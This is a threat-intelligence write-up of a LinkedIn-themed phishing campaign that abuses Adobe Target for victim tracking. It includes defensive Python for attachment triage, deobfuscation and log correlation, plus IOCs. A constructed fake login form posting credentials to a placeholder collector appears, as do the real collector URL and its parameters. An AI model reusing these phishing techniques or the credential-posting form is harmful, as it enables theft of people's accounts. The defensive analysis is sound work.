Fake LinkedIn Emails Abuse Adobe Target to Track and Steal Login Credentials


Not every attack begins with a zero-day exploit or a sophisticated payload buried deep in system memory. Sometimes, all an attacker needs is an email that looks professional, an attachment that appears harmless, and the implicit trust users place in familiar names like LinkedIn or Adobe.

A new phishing campaign discovered and published by researchers in late May 2026 is a textbook example of how social engineering can be combined with abuse of trusted infrastructure to build an attack chain that is simple in each of its parts yet capable of slipping past several layers of conventional security controls. This is not the kind of attack that requires exceptional technical skill, and that is precisely what makes it dangerous: it targets the hardest vulnerability to patch in any system, the human element.


Background and Attack Targets

LinkedIn has long been fertile ground for phishing campaigns targeting professionals and enterprises. The platform is synonymous with connection notifications, collaboration invitations, profile review requests, and business proposals — all types of content users may act on without much deliberation.

This campaign exploits exactly that familiarity. The attackers did not need to construct an elaborate scenario or impersonate a high-profile figure. All they needed was an email that looked professional enough, with content framed around a collaboration request or job inquiry. The ultimate objective was the victim's LinkedIn credentials — valuable assets that can be used to escalate further attacks, compromise corporate accounts, or simply be sold on underground marketplaces.


The Phishing Email and Initial Disguise Techniques

Email Content

The phishing email was crafted to resemble a business collaboration request or job proposal originating from a LinkedIn user. The email used professional language, subject matter consistent with a business networking context, and did not contain the glaring spelling errors commonly associated with lower-quality phishing campaigns.

However, closer inspection reveals several inconsistencies: the sender's display name, email address, and signature do not fully align with one another. The company name appearing in the email may be legitimate, but the declared geographic location does not match the company's actual registration details. These are precisely the kinds of signals that users without proper security awareness training are likely to overlook — especially when the email arrives during a busy workday.

The Disguised Attachment

The most notable element of the initial stage is how the attachment was constructed. Rather than using an executable (.exe) file or an Office document with embedded macros — both of which are commonly blocked or flagged by email security systems — the attackers used an HTML file with a double-extension naming convention in the format *.pdf.html.

This technique works by exploiting how operating systems and email clients render filenames. When a filename is long enough, the true extension (.html) may be truncated in the display interface, leaving users to see only the portion containing the word pdf and incorrectly assume the file is a standard PDF document. Even when users can see the full filename, the familiarity of the word "pdf" may be enough to lower their guard.
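The double-extension check described above, written as an added example for an email gateway (not code from the article or from the researchers it cites): it splits the extension chain, blocks names where a document-looking decoy extension sits in front of an active web extension, and approximates what a narrow attachment chip shows of a long name. The filenames are constructed samples, and the head-truncation rendering is an assumption about one common client display.

```python
"""Email-gateway style check for double-extension attachments.

Added example, not code from the article. It flags attachment names that end in an
active web extension but carry a document-looking decoy extension in front of it
(the *.pdf.html pattern described above). Sample filenames are constructed.
"""
from pathlib import PurePosixPath

# Extensions that mail clients and browsers render or execute as active content.
ACTIVE_EXTENSIONS = {"html", "htm", "shtml", "xhtml", "js", "hta", "svg"}
# Extensions users read as harmless documents or images; the decoy in a double extension.
DECOY_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "jpg", "png"}


def split_extensions(filename: str) -> list[str]:
    """Lower-cased extension chain: 'Proposal.PDF.html' -> ['pdf', 'html']."""
    return [s.lstrip(".").lower() for s in PurePosixPath(filename.strip()).suffixes]


def classify_attachment(filename: str) -> tuple[str, str]:
    """Return (verdict, reason); verdict is 'block', 'review' or 'allow'."""
    exts = split_extensions(filename)
    if not exts:
        return "allow", "no extension"
    final = exts[-1]
    if final not in ACTIVE_EXTENSIONS:
        return "allow", f".{final} is not active content"
    decoys = [e for e in exts[:-1] if e in DECOY_EXTENSIONS]
    if decoys:
        return "block", f"decoy .{decoys[-1]} in front of active .{final}"
    return "review", f"active content attachment (.{final})"


def displayed_name(filename: str, width: int) -> str:
    """What a narrow attachment chip may show (assumption: head truncation with '...',
    one common rendering). With width 22, 'Collab_Proposal.pdf.html' loses its '.html'."""
    return filename if len(filename) <= width else filename[: width - 3] + "..."


def triage(filenames: list[str]) -> dict[str, tuple[str, str]]:
    """Classify a batch and keep only the names that need gateway action."""
    results = {name: classify_attachment(name) for name in filenames}
    return {name: res for name, res in results.items() if res[0] != "allow"}


if __name__ == "__main__":
    sample = ["Collab_Proposal.pdf.html", "invoice.docx.html", "report.pdf",
              "index.html", "archive.tar.gz", "README"]  # constructed
    for name, (verdict, reason) in triage(sample).items():
        print(f"{verdict:6} {name:28} shown as {displayed_name(name, 22)!r}: {reason}")
```

A plain .html attachment lands in "review" rather than "block" so that legitimate HTML exports still reach a human; the decoy-plus-active combination is the pattern that justifies an outright block.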


Part II: The Malicious Code Inside the HTML File

Multi-Layer Obfuscation

The malicious HTML file was not designed to display any real document — it functions entirely as the entry stage of the attack chain. The content inside is heavily obfuscated, serving two primary purposes: concealing the true execution logic from static analysis and neutralizing detection rules based on simple signature matching.

The obfuscation techniques identified in this campaign include URL encoding combined with Base64 encoding, split across multiple separate sections of the source code before being reassembled and executed via JavaScript in the browser. This approach is common but effective, as it requires analysts to manually unpack each layer of obfuscation rather than simply reading through the source code.

The Fake Login Form and a Subtle Technical Detail

When the HTML file is opened in a browser, the victim is presented with a fake LinkedIn login page designed to closely mimic the authentic interface. One technically noteworthy detail: the victim's email address is typically hardcoded directly into the form, meaning the email field is pre-filled and cannot be changed or deleted by the user.

This serves two purposes at once. Psychologically, a pre-filled email field creates the impression of a seamless, legitimate authentication flow already in progress, nudging the user toward entering their password without hesitation. Technically, it stops automated analysis sandboxes and honeypot systems from submitting arbitrary test credentials to probe the form's behaviour, which reduces the attacker's risk of early detection by automated behavioural analysis.
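The two analyst tasks described in this part, unpacking the URL-encoded and Base64 layers split across several script fragments, and then spotting the hardcoded, read-only email field, as one added example (not the article's or the researchers' code). The block builds a constructed stand-in for the attachment so it runs offline; the collector hostname and the victim address in it are placeholders, not indicators from the campaign, and the reassembly script that a real file would carry is deliberately left out.

```python
"""Static unpacker and form inspector for a layered HTML attachment.

Added example, not code from the article. It builds a constructed stand-in for the
attachment (base64, then URL-encoding, split across script variables), unpacks it the
way an analyst would, and flags the hardcoded read-only email field and the off-site
form action. The collector URL and the victim address are placeholders.
"""
import base64
import re
from urllib.parse import quote, unquote, urlparse

# Constructed stand-in for the page the attachment finally renders.
DECODED_PAGE = (
    '<form method="post" action="http://collector.example.invalid/collect.php">'
    '<input type="email" name="AA" value="target@example.com" readonly>'
    '<input type="password" name="BB">'
    '<button type="submit">Sign in</button></form>'
)

FRAGMENT = re.compile(r'var\s+\w+\s*=\s*"([^"]*)"\s*;')
INPUT_TAG = re.compile(r"<input\b[^>]*>", re.I)
ATTR = re.compile(r'(\w+)\s*=\s*"([^"]*)"')


def build_sample_attachment(page: str, parts: int = 3) -> str:
    """Constructed sample mimicking the layering: base64, URL-encoding, then split
    across several script variables. The reassembly/render logic is omitted."""
    layered = quote(base64.b64encode(page.encode()).decode(), safe="")
    size = -(-len(layered) // parts)  # ceiling division
    chunks = [layered[i:i + size] for i in range(0, len(layered), size)]
    decls = "\n".join(f'var p{i} = "{chunk}";' for i, chunk in enumerate(chunks))
    return (f"<html><body><script>\n{decls}\n"
            "/* reassembly and rendering logic omitted in this sample */\n"
            "</script></body></html>")


def unpack(source: str) -> str:
    """Concatenate string fragments in source order, then undo URL-encoding and base64.
    Raises ValueError when the layers do not decode cleanly."""
    fragments = FRAGMENT.findall(source)
    if not fragments:
        raise ValueError("no string fragments found")
    try:
        return base64.b64decode(unquote("".join(fragments)), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError) as exc:
        raise ValueError(f"layers did not decode cleanly: {exc}") from exc


def inspect_form(page: str) -> dict:
    """Pull out the form action host, the field names and any pre-filled read-only email."""
    action_m = re.search(r'<form\b[^>]*\baction="([^"]*)"', page, re.I)
    action_host = urlparse(action_m.group(1)).hostname if action_m else None
    fields = []
    for tag in INPUT_TAG.findall(page):
        attrs = dict(ATTR.findall(tag))
        attrs["readonly"] = bool(re.search(r"\breadonly\b", tag, re.I))
        fields.append(attrs)
    hardcoded = [f for f in fields if "@" in f.get("value", "") and f["readonly"]]
    return {
        "action_host": action_host,
        "field_names": [f.get("name") for f in fields],
        "hardcoded_email": hardcoded[0]["value"] if hardcoded else None,
        # A locked-in email plus a form that posts anywhere but LinkedIn is the signal.
        "suspicious": bool(hardcoded) and not (action_host or "").endswith("linkedin.com"),
    }


def analyze_attachment(source: str) -> dict:
    """Unpack the attachment and inspect the decoded form in one step."""
    return inspect_form(unpack(source))


if __name__ == "__main__":
    print(analyze_attachment(build_sample_attachment(DECODED_PAGE)))
```

Real samples vary in how fragments are declared and joined, so the fragment regex is the part to adapt first; the decode step stays the same as long as the layers are URL-encoding over Base64 as described.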


Part III: The Campaign's Defining Technique — Abusing Adobe Target

What Is Adobe Target?

To understand why the abuse of Adobe Target is particularly concerning, it is important to grasp the legitimate role of this service. Adobe Target is a platform within the Adobe Experience Cloud suite, widely used by large enterprises to run content personalization campaigns and A/B testing on their websites.

The service operates through domains such as omtrdc.net, enabling organizations to track user behavior, segment audiences, and deliver different content to different user groups based on predefined conditions. Because this is a legitimate service operated by Adobe — one of the world's most established and trusted enterprise software companies — its associated domains are typically whitelisted in the vast majority of enterprise security systems.

How the Attackers Exploited This Service

The following URL was observed in the victim's network traffic:

https://lnkd.tt.omtrdc.net/rest/v1/delivery

Rather than sending the victim's data directly to a malicious server from the outset, the attackers used this endpoint as an intermediary relay point. Traffic flows through Adobe's infrastructure first, before being further directed according to the logic the attackers had configured.

The purpose of this step is twofold. On one hand, it allows the attackers to precisely track how many victims opened the file, how many interacted with the fake login form, and how many actually entered their passwords — effectively turning Adobe Target into a phishing campaign analytics tool. On the other hand, traffic passing through the omtrdc.net domain is treated as benign by many monitoring systems, helping the attackers extend the operational lifetime of the campaign before being detected and blocked.

This is a clear manifestation of the Living off Trusted Sites (LoTS) tactic — a growing trend in which threat actors prefer to abuse the legitimate infrastructure of cloud services, CDNs, and major platforms rather than building their own dedicated C2 infrastructure.


Part IV: Credential Harvesting and the Final Redirect

The Data Collection Server

After the Adobe Target relay step, the victim's credentials are forwarded to their true destination via a POST request to:

http://a1263367.xsph.ru/taam/Ln.php

A .ru domain with a randomly structured subdomain of this type is an unambiguous red flag for domain analysis systems integrated with threat intelligence feeds. The data transmitted includes at least two parameters: parameter AA containing the victim's email address (already embedded from the previous stage), and parameter BB containing the password the user just entered into the fake form.

This is the most rudimentary part of the campaign — a simple PHP script that receives POST requests and logs the data — but it does not need to be more sophisticated, because all the critical heavy lifting has already been performed in the preceding layers.

The "Cover Your Tracks" Redirect Technique

Immediately after harvesting the login credentials, the attacker's server-side PHP script executes one final step: it redirects the victim's browser to the legitimate page business.linkedin.com.

This is a small but deliberately calculated detail. For the vast majority of users, the experience of "entering credentials and being taken to the real LinkedIn page" will be interpreted as a successful login or a routine automatic redirect. This eliminates the victim's immediate motivation to report an incident, while simultaneously creating a valuable window of time during which the attackers can exploit the freshly compromised account before the victim suspects anything at all.


Tactical Assessment and Defensive Perspective

Strengths and Weaknesses of the Campaign

Viewed holistically, this campaign succeeds in weaving together multiple individually minor techniques into a highly cohesive attack chain. From the professional lure email, through the obfuscated double-extension HTML file, to the abuse of Adobe infrastructure as a tracking layer, and concluding with a redirect back to the legitimate site — each step serves a specific purpose in progressively reducing suspicion.

However, the most obvious weakness is the data collection endpoint: a .ru domain with a URL structure that is detectable if DNS and outbound HTTP traffic are properly monitored. Additionally, the fact that each victim's email address is hardcoded into the HTML file implies that each file is a customized version tailored to a specific target — suggesting this is a targeted campaign rather than a broad spray-and-pray spam operation.

Defensive Recommendations

For SOC and Blue Team practitioners, this campaign offers several detection and mitigation directions that can be acted upon immediately:

  • Email Gateway: Add detection rules for HTML attachments with double-extension naming patterns such as *.pdf.html, *.docx.html, or similar variants.

  • Endpoint Detection: Monitor browser processes that open HTML files from Downloads or Temp directories, especially when followed immediately by outbound network connections.

  • DNS / Web Proxy Monitoring: Build alerts for the behavioral chain: local HTML file → connection to omtrdc.net → POST to an unknown domain. This sequence is anomalous because regular users do not open HTML files that generate traffic through Adobe Target.

  • Threat Intelligence Integration: Add a1263367.xsph.ru and the associated AA/BB POST parameters to your TIP and SIEM to automatically identify similar patterns going forward.

  • Security Awareness Training: Train users to recognize double-extension files and reinforce the habit of never opening unsolicited email attachments — even when the email appears to originate from LinkedIn.
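The DNS / Web Proxy Monitoring and Threat Intelligence bullets above, turned into one correlation rule as an added example (not the article's own detection content). It walks per-host telemetry in time order and raises an alert when a browser opens an HTML file from a local download or temp folder, then reaches an omtrdc.net host, then POSTs to a domain outside an allowlist; a POST carrying exactly the AA/BB parameters raises the severity. The JSON log schema, the allowlist and the workstation names and paths are assumptions and constructed samples; the tracker and collector values are the article's IOCs.

```python
"""Correlation rule: local HTML opened -> Adobe Target hit -> POST to an unknown domain.

Added example, not from the article. Log lines are constructed (hostnames, paths and
the linkedin.com POST path are invented); the tracker and collector values are the
article's indicators. The event schema and allowlist are assumptions.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

SAMPLE_LOG = r'''
{"ts": "2026-05-28T09:12:01Z", "host": "WS-17", "type": "file_open", "image": "chrome.exe", "path": "C:\\Users\\a.nguyen\\Downloads\\Collab_Proposal.pdf.html"}
{"ts": "2026-05-28T09:12:03Z", "host": "WS-17", "type": "http", "method": "GET", "url": "https://lnkd.tt.omtrdc.net/rest/v1/delivery"}
{"ts": "2026-05-28T09:12:40Z", "host": "WS-17", "type": "http", "method": "POST", "url": "http://a1263367.xsph.ru/taam/Ln.php", "form_keys": ["AA", "BB"]}
{"ts": "2026-05-28T10:00:00Z", "host": "WS-22", "type": "http", "method": "GET", "url": "https://www.linkedin.com/feed/"}
{"ts": "2026-05-28T10:00:02Z", "host": "WS-22", "type": "http", "method": "GET", "url": "https://lnkd.tt.omtrdc.net/rest/v1/delivery"}
{"ts": "2026-05-28T10:05:00Z", "host": "WS-22", "type": "http", "method": "POST", "url": "https://www.linkedin.com/login-submit"}
'''

TRACKER_DOMAINS = ("omtrdc.net",)
ALLOWED_POST_DOMAINS = ("linkedin.com", "adobe.com")  # assumption: your own allowlist
LOCAL_DIRS = ("downloads", "temp", "tmp")
WINDOW = timedelta(minutes=10)


def parse_events(text: str) -> list[dict]:
    """One JSON object per line; timestamps become aware datetimes."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    for e in events:
        e["ts"] = datetime.fromisoformat(e["ts"].replace("Z", "+00:00"))
    return events


def domain_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def in_domain(host: str, suffixes: tuple) -> bool:
    return any(host == s or host.endswith("." + s) for s in suffixes)


def is_local_html_open(e: dict) -> bool:
    """An HTML file opened from a download or temp location (Windows or POSIX paths)."""
    if e["type"] != "file_open":
        return False
    p = e["path"].replace("\\", "/").lower()
    return p.endswith((".html", ".htm")) and any(f"/{d}/" in p for d in LOCAL_DIRS)


def correlate(events: list[dict]) -> list[dict]:
    """Emit one alert per local HTML open that is followed, within WINDOW, by a tracker
    hit and then a POST to a domain outside the allowlist."""
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        for i, opened in enumerate(evs):
            if not is_local_html_open(opened):
                continue
            later = [x for x in evs[i + 1:] if x["type"] == "http"
                     and x["ts"] - opened["ts"] <= WINDOW]
            tracker = next((x for x in later
                            if in_domain(domain_of(x["url"]), TRACKER_DOMAINS)), None)
            if tracker is None:
                continue
            exfil = next((x for x in later if x.get("method") == "POST"
                          and x["ts"] >= tracker["ts"]
                          and not in_domain(domain_of(x["url"]), ALLOWED_POST_DOMAINS)), None)
            if exfil is None:
                continue
            keys = set(exfil.get("form_keys", []))
            alerts.append({
                "host": host,
                "attachment": opened["path"],
                "tracker": domain_of(tracker["url"]),
                "collector": domain_of(exfil["url"]),
                # The article's AA/BB parameter pair is a campaign-specific marker.
                "severity": "high" if {"AA", "BB"} <= keys else "medium",
            })
    return alerts


def run_sample() -> list[dict]:
    return correlate(parse_events(SAMPLE_LOG))


if __name__ == "__main__":
    for alert in run_sample():
        print(json.dumps(alert))
```

WS-22 in the sample shows why the chain matters more than any single hop: it also reaches omtrdc.net and also POSTs a login, but from an ordinary linkedin.com session with no locally opened HTML file, so no alert fires. The rule keys on the sequence, which survives a change of collector domain, while the AA/BB check only adjusts severity.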


IOCs

The indicators below can be used for hunting, triage, or enrichment purposes within SIEM/SOAR platforms. Note that static IOCs have a short operational lifespan — the true long-term value of this campaign lies in its TTPs (Tactics, Techniques & Procedures), not in specific indicators alone.

IOC Type                 Value
Abused domain            lnkd.tt.omtrdc.net
URL endpoint             https://lnkd.tt.omtrdc.net/rest/v1/delivery
C2 domain                a1263367.xsph.ru
C2 URL                   http://a1263367.xsph.ru/taam/Ln.php
POST parameters          AA (email), BB (password)
Post-attack redirect     business.linkedin.com
Malicious file pattern   *.pdf.html
File type                Obfuscated HTML (URL encoding + Base64)
Lure theme               LinkedIn collaboration / job exchange proposal
Distinctive technique    Victim email hardcoded into the HTML form

References

  1. Fake LinkedIn emails abuse Adobe to track victims

  2. LinkedIn-themed phishing abuses Adobe’s A/B testing platform

  3. Fake LinkedIn Collaboration Emails Abuse Adobe Target to Track Victims in Phishing Campaign

FPT IS Security